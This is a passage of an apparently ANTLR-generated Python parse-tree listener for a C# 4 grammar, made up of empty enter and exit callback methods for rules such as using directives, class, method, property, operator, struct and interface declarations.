def enterExtern_alias_directive(self, ctx: CSharp4Parser.Extern_alias_directiveContext):
pass
# Exit a parse tree produced by CSharp4Parser#extern_alias_directive.
def exitExtern_alias_directive(self, ctx: CSharp4Parser.Extern_alias_directiveContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_directives.
def enterUsing_directives(self, ctx: CSharp4Parser.Using_directivesContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_directives.
def exitUsing_directives(self, ctx: CSharp4Parser.Using_directivesContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_directive.
def enterUsing_directive(self, ctx: CSharp4Parser.Using_directiveContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_directive.
def exitUsing_directive(self, ctx: CSharp4Parser.Using_directiveContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_alias_directive.
def enterUsing_alias_directive(self, ctx: CSharp4Parser.Using_alias_directiveContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_alias_directive.
def exitUsing_alias_directive(self, ctx: CSharp4Parser.Using_alias_directiveContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_namespace_directive.
def enterUsing_namespace_directive(self, ctx: CSharp4Parser.Using_namespace_directiveContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_namespace_directive.
def exitUsing_namespace_directive(self, ctx: CSharp4Parser.Using_namespace_directiveContext):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_member_declarations.
def enterNamespace_member_declarations(self, ctx: CSharp4Parser.Namespace_member_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_member_declarations.
def exitNamespace_member_declarations(self, ctx: CSharp4Parser.Namespace_member_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_member_declaration.
def enterNamespace_member_declaration(self, ctx: CSharp4Parser.Namespace_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_member_declaration.
def exitNamespace_member_declaration(self, ctx: CSharp4Parser.Namespace_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_declaration.
def enterType_declaration(self, ctx: CSharp4Parser.Type_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_declaration.
def exitType_declaration(self, ctx: CSharp4Parser.Type_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#qualified_alias_member.
def enterQualified_alias_member(self, ctx: CSharp4Parser.Qualified_alias_memberContext):
pass
# Exit a parse tree produced by CSharp4Parser#qualified_alias_member.
def exitQualified_alias_member(self, ctx: CSharp4Parser.Qualified_alias_memberContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_declaration.
def enterClass_declaration(self, ctx: CSharp4Parser.Class_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_declaration.
def exitClass_declaration(self, ctx: CSharp4Parser.Class_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifiers.
def enterClass_modifiers(self, ctx: CSharp4Parser.Class_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifiers.
def exitClass_modifiers(self, ctx: CSharp4Parser.Class_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifier.
def enterClass_modifier(self, ctx: CSharp4Parser.Class_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifier.
def exitClass_modifier(self, ctx: CSharp4Parser.Class_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter_list.
def enterType_parameter_list(self, ctx: CSharp4Parser.Type_parameter_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter_list.
def exitType_parameter_list(self, ctx: CSharp4Parser.Type_parameter_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameters.
def enterType_parameters(self, ctx: CSharp4Parser.Type_parametersContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameters.
def exitType_parameters(self, ctx: CSharp4Parser.Type_parametersContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter.
def enterType_parameter(self, ctx: CSharp4Parser.Type_parameterContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter.
def exitType_parameter(self, ctx: CSharp4Parser.Type_parameterContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_base.
def enterClass_base(self, ctx: CSharp4Parser.Class_baseContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_base.
def exitClass_base(self, ctx: CSharp4Parser.Class_baseContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_type_list.
def enterInterface_type_list(self, ctx: CSharp4Parser.Interface_type_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_type_list.
def exitInterface_type_list(self, ctx: CSharp4Parser.Interface_type_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter_constraints_clauses.
def enterType_parameter_constraints_clauses(self, ctx: CSharp4Parser.Type_parameter_constraints_clausesContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter_constraints_clauses.
def exitType_parameter_constraints_clauses(self, ctx: CSharp4Parser.Type_parameter_constraints_clausesContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter_constraints_clause.
def enterType_parameter_constraints_clause(self, ctx: CSharp4Parser.Type_parameter_constraints_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter_constraints_clause.
def exitType_parameter_constraints_clause(self, ctx: CSharp4Parser.Type_parameter_constraints_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter_constraints.
def enterType_parameter_constraints(self, ctx: CSharp4Parser.Type_parameter_constraintsContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter_constraints.
def exitType_parameter_constraints(self, ctx: CSharp4Parser.Type_parameter_constraintsContext):
pass
# Enter a parse tree produced by CSharp4Parser#primary_constraint.
def enterPrimary_constraint(self, ctx: CSharp4Parser.Primary_constraintContext):
pass
# Exit a parse tree produced by CSharp4Parser#primary_constraint.
def exitPrimary_constraint(self, ctx: CSharp4Parser.Primary_constraintContext):
pass
# Enter a parse tree produced by CSharp4Parser#secondary_constraints.
def enterSecondary_constraints(self, ctx: CSharp4Parser.Secondary_constraintsContext):
pass
# Exit a parse tree produced by CSharp4Parser#secondary_constraints.
def exitSecondary_constraints(self, ctx: CSharp4Parser.Secondary_constraintsContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_constraint.
def enterConstructor_constraint(self, ctx: CSharp4Parser.Constructor_constraintContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_constraint.
def exitConstructor_constraint(self, ctx: CSharp4Parser.Constructor_constraintContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_body.
def enterClass_body(self, ctx: CSharp4Parser.Class_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_body.
def exitClass_body(self, ctx: CSharp4Parser.Class_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_member_declarations.
def enterClass_member_declarations(self, ctx: CSharp4Parser.Class_member_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_member_declarations.
def exitClass_member_declarations(self, ctx: CSharp4Parser.Class_member_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_member_declaration.
def enterClass_member_declaration(self, ctx: CSharp4Parser.Class_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_member_declaration.
def exitClass_member_declaration(self, ctx: CSharp4Parser.Class_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#all_member_modifiers.
def enterAll_member_modifiers(self, ctx: CSharp4Parser.All_member_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#all_member_modifiers.
def exitAll_member_modifiers(self, ctx: CSharp4Parser.All_member_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#all_member_modifier.
def enterAll_member_modifier(self, ctx: CSharp4Parser.All_member_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#all_member_modifier.
def exitAll_member_modifier(self, ctx: CSharp4Parser.All_member_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#common_member_declaration.
def enterCommon_member_declaration(self, ctx: CSharp4Parser.Common_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#common_member_declaration.
def exitCommon_member_declaration(self, ctx: CSharp4Parser.Common_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#typed_member_declaration.
def enterTyped_member_declaration(self, ctx: CSharp4Parser.Typed_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#typed_member_declaration.
def exitTyped_member_declaration(self, ctx: CSharp4Parser.Typed_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declarators.
def enterConstant_declarators(self, ctx: CSharp4Parser.Constant_declaratorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declarators.
def exitConstant_declarators(self, ctx: CSharp4Parser.Constant_declaratorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declarator.
def enterConstant_declarator(self, ctx: CSharp4Parser.Constant_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declarator.
def exitConstant_declarator(self, ctx: CSharp4Parser.Constant_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#variable_declarators.
def enterVariable_declarators(self, ctx: CSharp4Parser.Variable_declaratorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#variable_declarators.
def exitVariable_declarators(self, ctx: CSharp4Parser.Variable_declaratorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#variable_declarator.
def enterVariable_declarator(self, ctx: CSharp4Parser.Variable_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#variable_declarator.
def exitVariable_declarator(self, ctx: CSharp4Parser.Variable_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#variable_initializer.
def enterVariable_initializer(self, ctx: CSharp4Parser.Variable_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#variable_initializer.
def exitVariable_initializer(self, ctx: CSharp4Parser.Variable_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_declaration.
def enterMethod_declaration(self, ctx: CSharp4Parser.Method_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_declaration.
def exitMethod_declaration(self, ctx: CSharp4Parser.Method_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_header.
def enterMethod_header(self, ctx: CSharp4Parser.Method_headerContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_header.
def exitMethod_header(self, ctx: CSharp4Parser.Method_headerContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifiers.
def enterMethod_modifiers(self, ctx: CSharp4Parser.Method_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifiers.
def exitMethod_modifiers(self, ctx: CSharp4Parser.Method_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifier.
def enterMethod_modifier(self, ctx: CSharp4Parser.Method_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifier.
def exitMethod_modifier(self, ctx: CSharp4Parser.Method_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#return_type.
def enterReturn_type(self, ctx: CSharp4Parser.Return_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#return_type.
def exitReturn_type(self, ctx: CSharp4Parser.Return_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#member_name.
def enterMember_name(self, ctx: CSharp4Parser.Member_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#member_name.
def exitMember_name(self, ctx: CSharp4Parser.Member_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_body.
def enterMethod_body(self, ctx: CSharp4Parser.Method_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_body.
def exitMethod_body(self, ctx: CSharp4Parser.Method_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#formal_parameter_list.
def enterFormal_parameter_list(self, ctx: CSharp4Parser.Formal_parameter_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#formal_parameter_list.
def exitFormal_parameter_list(self, ctx: CSharp4Parser.Formal_parameter_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_parameters.
def enterFixed_parameters(self, ctx: CSharp4Parser.Fixed_parametersContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_parameters.
def exitFixed_parameters(self, ctx: CSharp4Parser.Fixed_parametersContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_parameter.
def enterFixed_parameter(self, ctx: CSharp4Parser.Fixed_parameterContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_parameter.
def exitFixed_parameter(self, ctx: CSharp4Parser.Fixed_parameterContext):
pass
# Enter a parse tree produced by CSharp4Parser#default_argument.
def enterDefault_argument(self, ctx: CSharp4Parser.Default_argumentContext):
pass
# Exit a parse tree produced by CSharp4Parser#default_argument.
def exitDefault_argument(self, ctx: CSharp4Parser.Default_argumentContext):
pass
# Enter a parse tree produced by CSharp4Parser#parameter_modifier.
def enterParameter_modifier(self, ctx: CSharp4Parser.Parameter_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#parameter_modifier.
def exitParameter_modifier(self, ctx: CSharp4Parser.Parameter_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#parameter_array.
def enterParameter_array(self, ctx: CSharp4Parser.Parameter_arrayContext):
pass
# Exit a parse tree produced by CSharp4Parser#parameter_array.
def exitParameter_array(self, ctx: CSharp4Parser.Parameter_arrayContext):
pass
# Enter a parse tree produced by CSharp4Parser#property_declaration.
def enterProperty_declaration(self, ctx: CSharp4Parser.Property_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#property_declaration.
def exitProperty_declaration(self, ctx: CSharp4Parser.Property_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifiers.
def enterProperty_modifiers(self, ctx: CSharp4Parser.Property_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifiers.
def exitProperty_modifiers(self, ctx: CSharp4Parser.Property_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifier.
def enterProperty_modifier(self, ctx: CSharp4Parser.Property_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifier.
def exitProperty_modifier(self, ctx: CSharp4Parser.Property_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_declarations.
def enterAccessor_declarations(self, ctx: CSharp4Parser.Accessor_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_declarations.
def exitAccessor_declarations(self, ctx: CSharp4Parser.Accessor_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#get_accessor_declaration.
def enterGet_accessor_declaration(self, ctx: CSharp4Parser.Get_accessor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#get_accessor_declaration.
def exitGet_accessor_declaration(self, ctx: CSharp4Parser.Get_accessor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#set_accessor_declaration.
def enterSet_accessor_declaration(self, ctx: CSharp4Parser.Set_accessor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#set_accessor_declaration.
def exitSet_accessor_declaration(self, ctx: CSharp4Parser.Set_accessor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_modifier.
def enterAccessor_modifier(self, ctx: CSharp4Parser.Accessor_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_modifier.
def exitAccessor_modifier(self, ctx: CSharp4Parser.Accessor_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_body.
def enterAccessor_body(self, ctx: CSharp4Parser.Accessor_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_body.
def exitAccessor_body(self, ctx: CSharp4Parser.Accessor_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_declaration.
def enterEvent_declaration(self, ctx: CSharp4Parser.Event_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#event_declaration.
def exitEvent_declaration(self, ctx: CSharp4Parser.Event_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifiers.
def enterEvent_modifiers(self, ctx: CSharp4Parser.Event_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifiers.
def exitEvent_modifiers(self, ctx: CSharp4Parser.Event_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifier.
def enterEvent_modifier(self, ctx: CSharp4Parser.Event_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifier.
def exitEvent_modifier(self, ctx: CSharp4Parser.Event_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_accessor_declarations.
def enterEvent_accessor_declarations(self, ctx: CSharp4Parser.Event_accessor_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#event_accessor_declarations.
def exitEvent_accessor_declarations(self, ctx: CSharp4Parser.Event_accessor_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#add_accessor_declaration.
def enterAdd_accessor_declaration(self, ctx: CSharp4Parser.Add_accessor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#add_accessor_declaration.
def exitAdd_accessor_declaration(self, ctx: CSharp4Parser.Add_accessor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#remove_accessor_declaration.
def enterRemove_accessor_declaration(self, ctx: CSharp4Parser.Remove_accessor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#remove_accessor_declaration.
def exitRemove_accessor_declaration(self, ctx: CSharp4Parser.Remove_accessor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declaration.
def enterIndexer_declaration(self, ctx: CSharp4Parser.Indexer_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declaration.
def exitIndexer_declaration(self, ctx: CSharp4Parser.Indexer_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifiers.
def enterIndexer_modifiers(self, ctx: CSharp4Parser.Indexer_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifiers.
def exitIndexer_modifiers(self, ctx: CSharp4Parser.Indexer_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifier.
def enterIndexer_modifier(self, ctx: CSharp4Parser.Indexer_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifier.
def exitIndexer_modifier(self, ctx: CSharp4Parser.Indexer_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declarator.
def enterIndexer_declarator(self, ctx: CSharp4Parser.Indexer_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declarator.
def exitIndexer_declarator(self, ctx: CSharp4Parser.Indexer_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declaration.
def enterOperator_declaration(self, ctx: CSharp4Parser.Operator_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declaration.
def exitOperator_declaration(self, ctx: CSharp4Parser.Operator_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifiers.
def enterOperator_modifiers(self, ctx: CSharp4Parser.Operator_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifiers.
def exitOperator_modifiers(self, ctx: CSharp4Parser.Operator_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifier.
def enterOperator_modifier(self, ctx: CSharp4Parser.Operator_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifier.
def exitOperator_modifier(self, ctx: CSharp4Parser.Operator_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declarator.
def enterOperator_declarator(self, ctx: CSharp4Parser.Operator_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declarator.
def exitOperator_declarator(self, ctx: CSharp4Parser.Operator_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#unary_operator_declarator.
def enterUnary_operator_declarator(self, ctx: CSharp4Parser.Unary_operator_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#unary_operator_declarator.
def exitUnary_operator_declarator(self, ctx: CSharp4Parser.Unary_operator_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_unary_operator.
def enterOverloadable_unary_operator(self, ctx: CSharp4Parser.Overloadable_unary_operatorContext):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_unary_operator.
def exitOverloadable_unary_operator(self, ctx: CSharp4Parser.Overloadable_unary_operatorContext):
pass
# Enter a parse tree produced by CSharp4Parser#binary_operator_declarator.
def enterBinary_operator_declarator(self, ctx: CSharp4Parser.Binary_operator_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#binary_operator_declarator.
def exitBinary_operator_declarator(self, ctx: CSharp4Parser.Binary_operator_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_binary_operator.
def enterOverloadable_binary_operator(self, ctx: CSharp4Parser.Overloadable_binary_operatorContext):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_binary_operator.
def exitOverloadable_binary_operator(self, ctx: CSharp4Parser.Overloadable_binary_operatorContext):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_operator.
def enterOverloadable_operator(self, ctx: CSharp4Parser.Overloadable_operatorContext):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_operator.
def exitOverloadable_operator(self, ctx: CSharp4Parser.Overloadable_operatorContext):
pass
# Enter a parse tree produced by CSharp4Parser#conversion_operator_declarator.
def enterConversion_operator_declarator(self, ctx: CSharp4Parser.Conversion_operator_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#conversion_operator_declarator.
def exitConversion_operator_declarator(self, ctx: CSharp4Parser.Conversion_operator_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_body.
def enterOperator_body(self, ctx: CSharp4Parser.Operator_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_body.
def exitOperator_body(self, ctx: CSharp4Parser.Operator_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declaration.
def enterConstructor_declaration(self, ctx: CSharp4Parser.Constructor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declaration.
def exitConstructor_declaration(self, ctx: CSharp4Parser.Constructor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifiers.
def enterConstructor_modifiers(self, ctx: CSharp4Parser.Constructor_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifiers.
def exitConstructor_modifiers(self, ctx: CSharp4Parser.Constructor_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifier.
def enterConstructor_modifier(self, ctx: CSharp4Parser.Constructor_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifier.
def exitConstructor_modifier(self, ctx: CSharp4Parser.Constructor_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declarator.
def enterConstructor_declarator(self, ctx: CSharp4Parser.Constructor_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declarator.
def exitConstructor_declarator(self, ctx: CSharp4Parser.Constructor_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_initializer.
def enterConstructor_initializer(self, ctx: CSharp4Parser.Constructor_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_initializer.
def exitConstructor_initializer(self, ctx: CSharp4Parser.Constructor_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_body.
def enterConstructor_body(self, ctx: CSharp4Parser.Constructor_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_body.
def exitConstructor_body(self, ctx: CSharp4Parser.Constructor_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_declaration.
def enterStatic_constructor_declaration(self, ctx: CSharp4Parser.Static_constructor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_declaration.
def exitStatic_constructor_declaration(self, ctx: CSharp4Parser.Static_constructor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_modifiers.
def enterStatic_constructor_modifiers(self, ctx: CSharp4Parser.Static_constructor_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_modifiers.
def exitStatic_constructor_modifiers(self, ctx: CSharp4Parser.Static_constructor_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_body.
def enterStatic_constructor_body(self, ctx: CSharp4Parser.Static_constructor_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_body.
def exitStatic_constructor_body(self, ctx: CSharp4Parser.Static_constructor_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_declaration.
def enterDestructor_declaration(self, ctx: CSharp4Parser.Destructor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_declaration.
def exitDestructor_declaration(self, ctx: CSharp4Parser.Destructor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_body.
def enterDestructor_body(self, ctx: CSharp4Parser.Destructor_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_body.
def exitDestructor_body(self, ctx: CSharp4Parser.Destructor_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#body.
def enterBody(self, ctx: CSharp4Parser.BodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#body.
def exitBody(self, ctx: CSharp4Parser.BodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_declaration.
def enterStruct_declaration(self, ctx: CSharp4Parser.Struct_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_declaration.
def exitStruct_declaration(self, ctx: CSharp4Parser.Struct_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifiers.
def enterStruct_modifiers(self, ctx: CSharp4Parser.Struct_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifiers.
def exitStruct_modifiers(self, ctx: CSharp4Parser.Struct_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifier.
def enterStruct_modifier(self, ctx: CSharp4Parser.Struct_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifier.
def exitStruct_modifier(self, ctx: CSharp4Parser.Struct_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_interfaces.
def enterStruct_interfaces(self, ctx: CSharp4Parser.Struct_interfacesContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_interfaces.
def exitStruct_interfaces(self, ctx: CSharp4Parser.Struct_interfacesContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_body.
def enterStruct_body(self, ctx: CSharp4Parser.Struct_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_body.
def exitStruct_body(self, ctx: CSharp4Parser.Struct_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declarations.
def enterStruct_member_declarations(self, ctx: CSharp4Parser.Struct_member_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declarations.
def exitStruct_member_declarations(self, ctx: CSharp4Parser.Struct_member_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declaration.
def enterStruct_member_declaration(self, ctx: CSharp4Parser.Struct_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declaration.
def exitStruct_member_declaration(self, ctx: CSharp4Parser.Struct_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#array_type.
def enterArray_type(self, ctx: CSharp4Parser.Array_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#array_type.
def exitArray_type(self, ctx: CSharp4Parser.Array_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#non_array_type.
def enterNon_array_type(self, ctx: CSharp4Parser.Non_array_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#non_array_type.
def exitNon_array_type(self, ctx: CSharp4Parser.Non_array_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#rank_specifiers.
def enterRank_specifiers(self, ctx: CSharp4Parser.Rank_specifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#rank_specifiers.
def exitRank_specifiers(self, ctx: CSharp4Parser.Rank_specifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#rank_specifier.
def enterRank_specifier(self, ctx: CSharp4Parser.Rank_specifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#rank_specifier.
def exitRank_specifier(self, ctx: CSharp4Parser.Rank_specifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#dim_separators.
def enterDim_separators(self, ctx: CSharp4Parser.Dim_separatorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#dim_separators.
def exitDim_separators(self, ctx: CSharp4Parser.Dim_separatorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#array_initializer.
def enterArray_initializer(self, ctx: CSharp4Parser.Array_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#array_initializer.
def exitArray_initializer(self, ctx: CSharp4Parser.Array_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#variable_initializer_list.
def enterVariable_initializer_list(self, ctx: CSharp4Parser.Variable_initializer_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#variable_initializer_list.
def exitVariable_initializer_list(self, ctx: CSharp4Parser.Variable_initializer_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_declaration.
def enterInterface_declaration(self, ctx: CSharp4Parser.Interface_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_declaration.
def exitInterface_declaration(self, ctx: CSharp4Parser.Interface_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifiers.
def enterInterface_modifiers(self, ctx: CSharp4Parser.Interface_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifiers.
def exitInterface_modifiers(self, ctx: CSharp4Parser.Interface_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifier.
